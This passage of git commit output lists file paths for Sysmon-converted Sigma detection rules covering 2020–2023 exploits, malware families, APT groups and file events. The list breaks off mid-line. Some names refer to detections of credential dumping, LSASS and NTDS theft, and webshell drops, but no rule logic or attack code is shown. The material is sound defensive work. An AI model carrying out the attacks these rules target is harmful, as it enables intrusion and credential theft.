tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/file_event_win_malware_goofy_guineapig_file_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Malware/Bumblebee/create_remote_thread_win_malware_bumblebee.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_encrypted_payload_ioc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Cozy-Bear/image_load_apt_cozy_bear_graphical_proton_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/file_event_win_apt_diamond_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/image_load_apt_diamond_sleet_side_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Onyx-Sleet/file_event_win_apt_onyx_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_change/file_change_win_2022_timestomping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_backup_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_event_log_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_iis_access_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_powershell_command_history.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_prefetch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_teamviewer_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_delete_tomcat_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_access_susp_teams.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_access_susp_unattend_xml.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_advanced_ip_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_anydesk_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_bloodhound_collection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_system_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_csexec_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_dumpert.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_inveigh_artefacts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_nppspy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_quarkspw_filedump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_remote_cred_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_hktl_safetykatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_install_teamviewer_desktop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_iso_file_mount.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_iso_file_recent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lsass_default_dump_file_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lsass_shtinkering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_lsass_werfault_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_mal_adwind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_mal_octopus_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_msdt_susp_directories.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_net_cli_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_new_scr_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_dit_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_addin_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_macro_files_created.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_outlook_newform.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_startup_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_pcre_net_temp_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_module_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_rclone_config_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_remcom_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ripzip_attack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sam_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_colorcpl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_creation_by_mobsync.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_desktop_txt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_diagcab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_double_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_executable_creation.yml create mode 100644 